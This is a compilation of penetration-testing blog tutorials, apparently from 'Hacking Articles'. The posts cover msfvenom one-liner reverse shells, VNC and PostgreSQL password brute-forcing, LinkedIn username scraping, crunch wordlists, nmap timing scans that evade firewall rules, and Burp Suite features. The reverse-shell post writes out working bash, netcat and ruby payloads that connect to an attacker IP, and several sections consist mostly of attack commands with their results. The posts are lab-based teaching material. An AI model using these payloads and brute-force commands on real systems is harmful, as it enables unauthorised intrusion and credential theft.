msf exploit (scanner/postgres/postgres_login)> exploit

 From given below image you can observe that we had successfully grabbed the POSTGRES username and password.

Author: Rahul Virmani is a Certified Ethical Hacker and the researcher in the field of network Penetration Testing (CYBER SECURITY).   Contact Here

The post 6 Ways to Hack PostgresSQL Login appeared first on Hacking Articles.

Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using single line payload which is also known as stagers exploit that comes in metasploit.

Basically there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired terminal on a serial connection connected to mouse or keyboard and PTs is suedo tty terminal, to get the copy of terminals on network connections via SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open the terminal in your kali Linux and type msfconsole to load metasploit framework, now search all one-liner payloads for UNIX system using search command as given below, it will dump all exploit that can be used to compromise any UNIX system.

search cmd/unix

From given below image you can observed that it has dump all exploit that can be used to compromised any UNIX system. In this tutorial we are going to use some of payloads to spawn a TTY shell.

Bash Shell

In order to compromise a bash shell you can use reverse_bash  payload along msfvenom as given in below command.

msfvenom –p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_bash

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 1111 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 67 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTy shell.

For example when target will open (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121>) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 1111

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

whoami: it tells you are root user of the system you have compromised.

Netcat Shell

In order to compromise a netcat shell you can use reverse_netcat payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_netcat

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 2222 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 104 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

when target will open ( mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admsozx | /bin/sh >/tmp/admson 2>&1; rm /tmp/admoszx ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 2222

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell.

Perl shell

In order to compromise a perl shell you can use reverse_perl payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_perl

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 3333 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 232 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Now again when target will open malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 3333

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell. Here we found target IP address: 192.168.1.1106 by executing ifconfig command in his TTY shell.

Python Shell

In order to compromise a python shell you can use reverse_Python payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_python

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 4444 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open the following malicious code in his terminal, attacker will get reverse shell through netcat.

nc -lvp 4444

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

Ruby Shell

In order to compromise a ruby shell you can use reverse_ruby payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_ruby

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 5555 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 131 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open (ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“192.168.1.103″,”5555″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’) malicious code in his terminal, attacker will get reverse shell through netcat.

nc -lvp 5555

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.

For example:

ifconfig: it tells IP configuration of the system you have compromised.

bin/sh shell

In order to compromise a command shell you can use reverse_netcat_gaping payload along msfvenom as given in below command.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

 Here we had entered  following detail to generate one-liner raw payload.

-p : type of payload you are using i.e. cmd/unix/reverse_netcat_gaping

Lhost: listening IP address i.e. Kali Linux IP

Lport: Listening port number i.e. 6666 (any random port number which is not utilized by other services)

R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

In order to access bin/sh shell of target system for compromising TTY shell firslty we had access PTs termianl  of  target through SSH and then past the malicious code (nc 192.168.1.103 6666 -e /bin/sh

) inside PTY terminal.

nc -lvp 6666

From given below image you can observe that we had successfully access TTy shell of target system.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Spawn TTY Shell using Msfvenom (One Liner Payload) appeared first on Hacking Articles.

In this article, we will learn how to gain control over our victim’s PC through 5900 Port use for VNC service. There are various ways to do it and let take time and learn all those because different circumstances call for different measure.

 Let’s starts!!

 xHydra 

This is the graphical version to apply dictionary attack via 5900 port to hack a system. For this method to work:

Enter xHydra in your kali Linux terminal. And select Single Target option and their give the IP of your victim PC. And select VNC in box against Protocol option and give the port number 5900 against the port option.

Now, go to Passwords tab and select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.

After doing this, go to Start tab and click on Start button on the left.

Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, vnc, http, https, smb, several databases, and much more

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

 Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc

-P:  denotes path for password list

-s: denote destination port number

-t: Run TASKS number of connects in parallel

Once the commands are executed it will start applying the dictionary attack and so you will have the right password in no time. As you can observe that we had successfully grabbed the VNC password as 098765

Metasploit

This module will test a VNC server on a range of machines and report successful logins. Currently it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge response authentication method.

use auxiliary/scanner/vnc/vnc_login

msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6

msf auxiliary(scanner/vnc/vnc_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/vnc/vnc_login) > run

Awesome!! From given below image you can observe the same password: 098765 have been found by metasploit.

Patator

 Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. It is quite useful for making brute force attack on several ports such as VNC, HTTP, SMB and etc.

patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0

From given below image you can observe that the process of dictionary attack starts and thus, you will attain the password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, VNC, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few

Run the following command

Medusa  -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc

Here

-u: denotes username

-P:  denotes path for password list

As you can observe that we had successfully grabbed the VNC password as 098765.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900

 Here

-U: denotes path for username list

-P:  denotes path for password list

As you can observe that we had successfully grabbed the vnc password as 098765.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post 6 Ways to Hack VNC Login Password appeared first on Hacking Articles.

Hello friends!! Today you will learn how to extract username from any social site such as Facebook, LinkedIn and etc. using burp suite pro. Burpsuite pro provides Python Scripter as an advance option which can be helpful in gathering username for the process of reconnaissance in penetration testing.

Python Scripter: This extension allows execution of a custom Python script on each HTTP request and response processed by Burp.

To use, type or paste a Python script into the “Script” tab, and use Burp in the normal way. The script will be executed for each HTTP request and response.

 Let’s Start!!

First to install the extension Python Scripter from the BApp Store in the Extender Tab, we need to install the Jython standalone-2.7.0 JAR file. Now explore the Extender tab then click on options tab and browse the location for the Jython standalone JAR as shown in the image

Now we can simply install the Python Scripter extension from the BApp Store.

Now click on this link (https://raw.githubusercontent.com/clr2of8/Gather-Usernames-From-Google-LinkedIn-Results/master/scrape-google-linkedin.txt) and copy the complete code.

Now paste the copied code on the Script Tab formed by installing the Python Scripter Extension. If you will analysis this python script then you will realize that, it has been design for LinkedIn therefore we will look for LinkedIn username. But if you want to gather Facebook or any other website username then replace it from the word ‘LinkedIn’

Now go to the Extensions Tab within the Extender Tab then click on Output Tab and select Save to File option in order to save the username in any text document as an output result, here we have given the path of our empty txt file where all the username’s will be saved.

Now just do a Google search with help of Google dork of site:linkedin.com/in “certification name” “Company Name” as shown in the image.

Here using above Google dork we will extract LinkedIn username who is CEH certified employee of ignite technologies.

As you can see we have intercept the request of the Google search in a usual way using burpsuite, now close the intercept tab and the script will save the usernames in the .txt file.

In the end we can see all the usernames related to the company are saved, as Google limits result 10 per page we can also save usernames on the next pages. This technique is very useful where we want to gather a large list of names quickly and easily.

Reference: Link1 & Link2

Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Extract LinkedIn Usernames from Google using Burpsuite pro appeared first on Hacking Articles.

Hello friends!! Today we will demonstrate how a pentester can generate his own wordlist for username either password using the most powerful tool CRUNCH. In kali Linux you can easily get crunch by exploring Application > Password Attacks > Crunch

Crunch can generate a wordlist subject to the conditions you specify and its output file can be used in any other another program or file.

We are using crunch version 3.6 for this tutorial and followed given below parameters for generating wordlist.

Syntax: <min> <max> [character-string] [options]

Min-len:  This parameter specify minimum length string required for crunch to start generating wordlist.

Max-len: This parameter specify maximum length string required for crunch to end.

Charset string: This parameter specify character sets for crunch to use for generating wordlist from that string, if you have not specified any string then crunch will default characters string.

Options: crunch serves you a list of options which increase its functionality for generating wordlist as per your requirement.

Generating wordlist without using character string

Execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using default character sets. It will start from aa and end with zzz.

crunch 2 3 -o  /root/Desktop/0.txt

Here we had used following parameters for generating a dictionary:

Min_len: 2 for two character letters

Max_len: 3 for three character letters

-o: This option denotes the path to save the output in a text file.

From given below image you can observe that it has generated 18252 number of lines and saved in 0.txt file.

Now here we had used cat command to read the content from inside 0.txt file where we can perceive that it has start from aa and end with zzz as shown in given below image.

cat /root/Desktop/0.txt

Generating wordlist using character string

Now execute given below command which will generate a dictionary that contains minimum 3 character letters and maximum 4 by using “raj” as specified string. Similarly it will start from rrr and end with jjjj.

crunch 3 4  raj -o  /root/Desktop/1.txt

From given below image you can observe that it has generated 108 number of lines and saved in 1.txt file.

Now we had used cat command to read the content from inside 1.txt file where we can perceive that it has start from rrr and end with jjjj.

cat /root/Desktop/1.txt

Similarly we can use string of any number for making a dictionary which contains numeric characters.

For example: some users set their date of birth as password and we would like to generate a dictionary that contains combination of four number such that it represent month and date for instant 25^th May as 2505 then you can use “2505” as character string for generating a numeric wordlist.

Generating alpha-numeric wordlist

You can generate you own alpha-numeric wordlist, execute given below command which will generate a dictionary that contains minimum 2 character letters and maximum 3 by using “raj123” as specified string. 

You can set minimum and maximum length for your wordlist as per your requirement.

crunch 2 3  raj123 -o  /root/Desktop/3.txt

Again we had used cat command to read the content from inside 3.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/3.txt

Generating wordlist along with space character

Following command will generate wordlist using space character (\) with string “raj”. Instead of using (\) you can also use double quotes around string as “raj ” along with space within double quotes. 

crunch 1 3  raj\ -o  /root/Desktop/4.txt

Create wordlist using character set file of RainbowCrack

As we known rainbow crack has a character set file which is used for cracking hashes by using rainbow table, but we’ll use this character set file for generating a complex wordlist as per situation demands.

cat /usr/share/rainbowcrack/charset.txt

We had used cat command to express the list of character set that has been stored in charset.txt of rainbowcrack.  From given below image you can observed that it is showing following list of character set.

• Numeric
• Alpha
• Alpha-numeric
• Loweralpha
• Loweralpha numeric
• Mixalpha
• Mixalpha-numeric
• Ascii -32-95
• Ascii -32-65-123-4
• Alpha-numeric-symbol32-space

Now you can choose any character set for generating wordlist. Let suppose I want to generate a wordlist which contains lower alphabets letter along with numeric number for 5 letter words so for that I will execute following command.

crunch  4 5  -f /usr/share/rainbowcrack/charset.txt loweralpha-numeric -o  /root/Desktop/5.txt

Here –f denotes Specifies a character set from the charset.lst

Again we had used cat command to read the content from inside 5.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/5.txt

Generate wordlist with specific Pattern

Crunch provides –t option to generate a wordlist using a specific pattern as per your requirement.

Using option –t you can generate 4 type patters as specified below:

• Use @ for lowercase alphabets
• Use , for uppercase alphabets
• Use % for numeric character
• Use ^ for special character symbol

For generating a wordlist that contains 3 numeric characters on the right side of string “raj” for instant raj123, we need to execute following command.

Since we have 3 letters from string raj and we are assuming 3 more numeric number after the given string, therefore the minimum length should be sum of string and pattern character.

crunch 6 6 -t raj%%% -o/root/Desktop/6.txt

Here –t denotes % pattern is used for editing 3 numeric character.

Again we had used cat command to read the content from inside 6.txt file where we can perceive that it has combination of alpha-numeric character.

cat /root/Desktop/6.txt

Generate wordlist with Duplicate character limit

Crunch let you bound the repetition of character by using –d parameters along with the given pattern. 

As we saw, above the pattern for raj%%% starts with raj000 which means every single number will consecutive either twice or thrice such as it will contain word as raj000, raj001, raj111, raj110 and so on in the wordlist.

If you don’t wish to create a wordlist with repeated number then you can use –d option to set filter for repetition.

For example: I want to generate a wordlist by using above pattern i.e. raj%%% and consecutive repetition of each number almost twice. For implementing such type of dictionary we need to execute below command.

crunch 6 6 -t raj%%% -d 2% -o/root/Desktop/6.1.txt

here we had use following parameter

–t denotes % pattern is used for editing 3 numeric character

-d denote % pattern is used for editing 3 numeric character with repetition of each number almost twice.

Again we had used cat command to read the content from inside 6.1.txt file where we can perceive that it has combination of alpha-numeric character with repetition of each number two times.

cat /root/Desktop/6.1.txt

Now if you will compare output file 6.txt and 6.1.txt then you can notice difference of number repetition.

Generate wordlist with Pattern for uppercase letter

For generating a wordlist that contains 3 uppercase characters on the right side of string “raj” for instant rajABC, we need to execute following command.

Since we have 3 letters from string raj and we are assuming 3 more uppercase letter after the given string, therefore the minimum length should be sum of string and pattern character.

crunch 6 6 -t raj,,, -o/root/Desktop/7.txt

Here –t denotes (,) pattern is used for editing 3 uppercase letter character.

Again we had used cat command to read the content from inside 7.txt file where we can perceive that it has combination of mix-alpha character.

cat /root/Desktop/7.txt

Similarly we can set limit for uppercase letter repletion as done above. So if I want that alphabets should not be consecutive then we can execute given below command for generating such type of dictionary.

crunch 6 6 -t raj,,, -d 1, -o/root/Desktop/7.1.txt

–t denotes (,) pattern is used for editing 3 uppercase character

-d denote (,) pattern is used for editing 3 uppercase character with repetition of each number almost one.

Again we had used cat command to read the content from inside 7.1.txt file where we can perceive that it has combination of mix-alpha character with repetition of each number two times.

cat /root/Desktop/7.1.txt

Now if you will compare output file 7.txt and 7.1.txt then you can notice difference of alphabet repetition.

Use Permutation for generating wordlist

-p option is used for generating wordlist with help of permutation, here can ignore min and max length of character string. Moreover it can be used with one word string or multiple words string as given below.

crunch 3 6 –p raj chandel hackingarticles

From given below image you can analysis the output result and get maximum number of permutation generated.

Generate Dictionary with limited words

If you will observe above all output result then you will find crunch has generated dictionary and displays the number of line for each dictionary. For instance text file 0.txt has 18252 number of line and each line contains one word only.

So if you wish to set filter for certain number of line should be generated then execute given below line.

crunch 5 5 IGNITE -c 25 -o /root/Desktop/8.txt

It will generate a dictionary of 25 words only and save output in 8.txt.

Again we had used cat command to read the content from inside8.txt file where we can perceive that it has only 25 alpha character.

cat /root/Desktop/8.txt

Wordlist Fragmentation

Use –b option for wordlist fragmentation that split a single wordlist into multi wordlist. It is quite useful option for dividing wordlist which is in GB can break into MB.

crunch 5 7 raj@123 -b 3mb –o START

From given below image you can observe that it has divided a 7MB file into three text file.

Generate compressed Dictionary

Crunch let you generate compress wordlist with option –z and other parameters are gzip, bzip2, lzma, and 7z, execute given below command for compression.

crunch 5 7 raj@123 –z gzip –o START

 From given below image you can observe that it has generated compress text file.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Comprehensive Guide to Crunch Tool appeared first on Hacking Articles.

Today we will determine the effectiveness of different blocker such as Ghostery, Adblock Ultimate and Ublock Origin which are extension of browser’s and their work is to block Ad’s popping up while browsing through websites on your browser.

To make use of these extension’s you need to install and enable them. We will determine the strength of these Ad Blocker’s by checking the number of HTTP GET Request they allow a website to generate which is explained as follows.

Let’s start!!

Examine HTTP Request without any Ad-blocker

In order to analyze this we have intercepted the request of the website CNN.COM.

Using Burp suite in our usual way without any Extension or Ad-Blocker enabled. Then we have turn off the intercept tab after capturing the request of the website.

Click on HTTP History Tab under the Proxy Tab, where we see that the website has made 122 HTTP GET requests. These requests are generated without any extension enabled.

Examine Adblock Ultimate Extension

Similar next we have intercepted the request of the website CNN.com when installed AdBlock Ultimate is enable in our Firefox.

Next we have intercepted the request of the website CNN.com when installed AdBlock Ultimate is enable in our Firefox. Then we have turn off the intercept tab after capturing the request of the website.

Click on HTTP History Tab under the Proxy Tab, where we see that the website has made 116 HTTP GET requests. As you can see the number of request have reduced which shows the strength.

Examine Ghostery Extension

Similar next we have intercepted the request of the website CNN.com when installed Ghostery is enable in our Firefox.

Using Burp suite in our usual way but with Ghostery Extension enabled. Then we have turn off the intercept tab after capturing the request of the website.

Click on HTTP History Tab under the Proxy Tab, where we see that the website has made 113 HTTP GET requests. As you can see the number of request have reduced which shows the strength of the Ghostery Extension is better than AdBlock Ultimate Extension.

Examine UBlock Origin

We have intercepted the request of the website CNN.com when ublock origin is enabled.

Using Burp suite in our usual way but with Ublock Origin Extension enabled. Before capturing the request of the website you need to install the Extension and Enable it. Then we have turn off the intercept tab after capturing the request of the website.

Click on HTTP History Tab under the Proxy Tab, where we see that the website has made 110 HTTP GET requests. As you can see the number of request have reduced which shows the strength of the Ublock Origin Extension.

Conclusion: looking at conclusion from given below table you can decide whose strength is better.

 Author: Ashray Gupta is a Researcher and Technical Writer at Hacking Articles. He is a certified ethical hacker, web penetration tester and a researcher in nanotechnology. Contact Here

The post Examine Browser Ad-Blockers Strength using Burpsuite appeared first on Hacking Articles.

In this article we are going to scan the target machine with normal Nmap scan along with Timing template and the time between packets can be confirmed by analysis of Nmap traffic through Wireshark.

Timing template in nmap is defined by –T<0-5> having -T0 as the slowest and –T5 as the fastest. By default all nmap scans run on –T3 timing template. Timing template in Nmap is used to optimize and improve the quality and performance of scan to get desired results.

Let’s start!!

Nmap Insane (-T5) Scan

This template is used for sending packets insanely fast and waits only 0.3 seconds for response. The time difference between two packets sent is upto 5 milliseconds. This timing template makes the scan superfast but the accuracy is sacrificed sometimes. Nmap gives-up on a host if it couldn’t complete the scan within 15 minutes. Other than that, -T5 should be used only on fast network and high end systems as sending packets this fast can affect the working of the network or system and can result into system failure.

For using timing template use the attribute –T<0-5> after Nmap while scanning a target network

nmap -T5 -p21-25 192.168.1.104

Here are the packets sent to the target IP are sent by a maximum difference of 5 milliseconds or 0.005 seconds

Packet 1 has Arrival Time of 04:41:04.557153433

Packet 2 has Arrival Time of 04:41:04.557225304

The difference between the arrival time of Packet 1 and Packet 2 is about 0.07 milliseconds.

Nmap Aggressive (-T4) Scan

This template is used for sending packets very fast and waits only 1.25 seconds for response. The time difference between two packets sent is upto 10 milliseconds. Nmap official documentation recommends using –T4 for “reasonably modern and reliable networks”.

nmap –T4 –p21-25 –d 192.168.1.104

Here are the packets sent to the target IP are sent by a maximum difference of 5 milliseconds or 0.005 seconds

Packet 1 has Arrival Time of 05:58:34.636899267

Packet 2 has Arrival Time of 05:58:34.637122896

The difference between the arrival time of Packet 1 and Packet 2 is about 0.2 milliseconds.

Nmap Normal (-T3) Scan

This is the default nmap timing template which is used when -T argument is not specified.

nmap –T3 –p21-25 –d 192.168.1.104

Packet 1 has Arrival Time of 06:01:12.574866212

Packet 1 has Arrival Time of 06:01:12.575059033

The difference between the arrival time of Packet 1 and Packet 2 is about 0.1 milliseconds.

Nmap Polite (-T2) Scan

This template is used for sending packets quickly then –T0 and –T1 but still slower than normal scan. The time difference between two packets sent is 0.4 seconds.

nmap -T2 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:07:38.139876513

Packet 2 has Arrival Time of 06:01:12.540686453

Nmap Sneaky (-T1) Scan

This template is used for sending packets quickly but still slower than normal scan. The time difference between two packets sent is 15 seconds.

nmap -T1 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:17:02.354879724

Packet 2 has Arrival Time of 06:17:17.371063606

The difference between the arrival time of Packet 1 and Packet 2 is about 15 seconds.

Nmap Paranoid (-T0) Scan

This template is used for sending packets very slowly as only one port is scanned at a time. The time difference between two packets sent is 5 minutes.

nmap -T0 -p21-25 192.168.1.104

Packet 1 has Arrival Time of 06:32:25.043303267

Packet 2 has Arrival Time of 06:37:25.080804929

The difference between the arrival time of Packet 1 and Packet 2 is about 5 minutes.

Evading Time Based Firewall rules using timing templates

Block Insane T5 scan

Even though we can speed up the scan by –T5 and –T4 templates, there are chances that the target system is using some kind of firewall rules to secure itself. Here are some examples of the firewall rules and methods to bypass them.

This rule will block tcp packets from an IP address if the packet count goes more than 1. In other words only first packet will be responded from an IP address in 1 second.

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –update –seconds  1 –hitcount 1 -j DROP

If you’re scanning more than 1 port on a target system having above rule, the result will not be as desired. Like if we use -T5 or -T4 in nmap scan, the time difference between packets is very much less than 1 second so if we scan five ports at a time it will show one as open/closed and others as filtered. But -T5 has also –max-retries set to 2 means it will retry to get reply from ports 2 more times hence there will be 3 out 5 ports with accurate open/close status and the rest 2 with filtered status

nmap -T5 -p21-25 192.168.1.104

From given below image you can observe that it has shown 3 ports are open and 2 ports are filtered.

The packet transfer between the target and the victim is captured through wireshark, it clearly shows that the TCP SYN packets are send multiple times on ports 22 and 23 and didn’t received any reply packet for those request packet.

Bypass Insane T5 Firewall filter

1^st method

Use –max-retries argument to increase the –max-retries value so that each retry gives accurate status of one port at a time. Execute given below command for increasing maximum retries with T5 scan here I had 4 you can modify it as per your requirement.

nmap -T5 -p21-25 192.168.1.104 –max-retries 4

now if you notice from given below image you can observe that it has shown all 5ports are open.

Here, the packet transfer shows that in each retry one different port sends the reply in order to confirm its statusas shown in given below image.

2^nd Method

The second method is to use a timing template which has a greater time difference between packets, like here we can use time template below T5 i.e. from T4 to T0 to bypass above rule.

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

or

nmap -T1 -p21-25 192.168.1.104

or

nmap -T0 -p21-25 192.168.1.104

Here, the packet transfer shows that each port has sent the reply but first reply was instantly and other ports replied one by one after some time.

Block Aggressive T4, Normal T3 & Polite T2 Scan

Now given below rules will block tcp packets from an IP address if the packet count goes more than 1. In other words only first packet will be responded from an IP address in 3 seconds.

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –update –seconds  3 –hitcount 1 -j DROP

Here we are using -T4 for scanning 5 ports, the time difference between packets is very much less than 1 second so if we scan five ports at a time it will show one as open/closed and others as filtered. But –T4 has also –max-retries set to 6 means it will retry to get reply from ports 6 more times but as the time limit exceeds the total time taken by all retries it will show all ports filtered

nmap -T4 -p21-25 192.168.1.104

or

nmap -T3 -p21-25 192.168.1.104

or

nmap -T2 -p21-25 192.168.1.104

or

Result of T4, T3, and T2 scan can be as either all port will be filtered or any one port can show open/close state. From given below image you can observe that it has shown all 5 ports are filtered.

Here we can see that none of the packets got reply

Bypass Aggressive T4, Normal T3 & Polite T2 Firewall filter

To bypass this kind of rule we have to use a Timing Template which is slower than -T4

nmap -T1 -p21-25 192.168.1.104

Here we can see that all the packets got reply because time interval in T1 is almost 15 seconds.

Block Sneaky (-T1) Scan

Now this rule is to block tcp packets from an IP address if the packet count goes more than 1. In other words only first packet will be responded from an IP address in 200 seconds.

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –set

sudo iptables -I INPUT -p tcp -m state –state NEW -m recent –update –seconds  200 –hitcount 1 -j DROP

Now repeat the T1 scan again as given below and this time you will found that firewall is blocking our Nmap probes for identify open/close state of any port.

nmap -T1-p21-25 192.168.1.104

Results of T1 scan can be as either all port will be filtered or any one port can show open/close state. From given below image you can observe that it has shown all 4 ports are filtered.

Here we can see that only one of the packets got reply rest are drop by firewall.

Bypass Sneaky (-T1) Scan

To bypass this kind of rule we have to use a Timing Template which has time difference in packets for more than 200 seconds, therefore use paranoid time scan because time difference between two packets is near about 5 mints as discussed above.

nmap -T0 -p21-25 192.168.1.104

From given below image you can observe that it has taken 1813.61 sec which is close to 30 mints for scanning 5 ports and found open state for all 5 ports.

Here we can see that we have got response of every packet even though the firewall had the security rules set.

To evade any type of IPS or Firewall, you need to remember that it will take much longer time than usual to scan the target system using slower timing template so try to specify a small number of ports so that the slower scans doesn’t take time to scan the ports that you don’t intended to.

Auhtor:  Deepanshu is a Certified Ethical Hacker and a budding Security researcher. Contact here.

The post Understanding Guide for Nmap Timing Scan (Firewall Bypass) appeared first on Hacking Articles.

Hello friends!! Today we are going to discuss advance option of Burp Suite pro for web penetration testing; here we had used Bwapp lab which you can install from here and acunetix vulnerable web application which is available online for making web application penetration practices.

Burp suite Advance Usage

• Burp Infiltrator
• Macros
• Burp Clickbandit

Burp Infiltrator

Burp Infiltrator is a tool used to target web applications in order to test them using Burp Scanner. Burp Infiltrator is used to target application so that Burp can detect cases where its input can pass unsafe APIs on the server side.

Burp Infiltrator supports applications which are written in:

• Java, Groovy, Scala, or other JVM languages (JRE versions 1.4 – 1.8)
• C#, VB, or other .NET languages (.NET versions 2.0 and later)

Let’s start!!

First, we need to enable the Burp Infiltrator from the Burp tab in burpsuite where we have to select the Burp Infiltrator option. Then we will see a Burp Infiltrator box will appear where you have to select the type of application you want to instrument as you shown in the image

 After that we need to select the folder where we want the Infiltrator file to be saved, so that we can enable it later using the terminal.

Next we will give the path of the folder where the infiltrator file will be saved as shown in the image.

Than the Burp Infiltrator file will be saved as burp_infiltrator_java.jar.

Now to enable the burp infiltrator file we will go to the path of the file using the terminal, than to execute it we need to give the command java –jar burp_infiltrator_java.jar –non interactive. Then Press Enter the file will be executed.

We have used –non interactive in our command so that it will automatically configured the default settings else we have to manually configure all the settings. Now we can intercept the request of any website or application based on the supported parameters as shown in the image.

Turn off Intercept Tab. Select the Target Tab where we can see a Sub Tab in it as Site Map as shown in the image.

Then select the Url you want to scan using burp infiltrator, just Right click on the Url then select option Actively scan this host this will give all the issues related to the Website or application we want to scan. All the Issues related to the Url scanned can be seen in the Issue box as shown in the image.

Macros

Burp suite has a new session handling ability which can be used to run macros, according to session handling rules. A macro can be said as a predefined sequence of one or more than one request. The cases in Macros may include:

• Fetching a page such as a user’s home page just to check whether the current session is still valid or not.
• By performing a login operation to obtain a new valid session.
• A token or nonce obtained can be used as a parameter in another request.

The Macros can be recorded using your browser. When defining a macro, Burp suite displays the Proxy history, from which you can select the requests to be used for the macro. You can select from previously made requests, or record a fresh macro and select the new items from the history. When you have recorded the macro, the macro editor shows the details of the items in the macro, which you can review and configure as per requirement.

Let’s start!!

First we have intercepted the login request of Bwapp Lab where we have given the default username and password as shown in the image.

The request is captured in the Intercept Tab then Right Click anywhere around the captured request, next we need to select the option Do Intercept which has a sub option Response to this request. Click on it.

Then we have forward the captured request until we are successfully logged into the Bwapp Lab.

After that go to Project options Tab where we need to select the Sessions Tab as shown in the image.

Click on Add Button under the Session Handling Rules which will open a Session handling rule editor window where we have given a name to the Rule under the Rule description as shown in the image.

Click on Add Button under Rule Action then select Check session is valid option which will open a window for Session handling action editor then give a expression you want the burp suite to look up in the Url like we have given login.php and Tick the option If session is invalid, perform the action below as shown in the image.

Click on Add Button under Select Macro which open a window of Macro Recorder where we will select the item from the proxy history that we want to include in the Macro as shown in the image, Click Ok.

Next the Macro Editor window will open where we will give a name to the macro in the Macro description field as shown in the image. Click Ok.

After this we will get back to Session handling rule editor where we will click on the Scope tab then we need to tick the options Extender, Proxy under Tools Scope and Include all URL’s under URL Scope, Click Ok now the macro will be running in the background.

As you can see in the image we are on the login page of the Bwapp Lab where we have not given any login details.

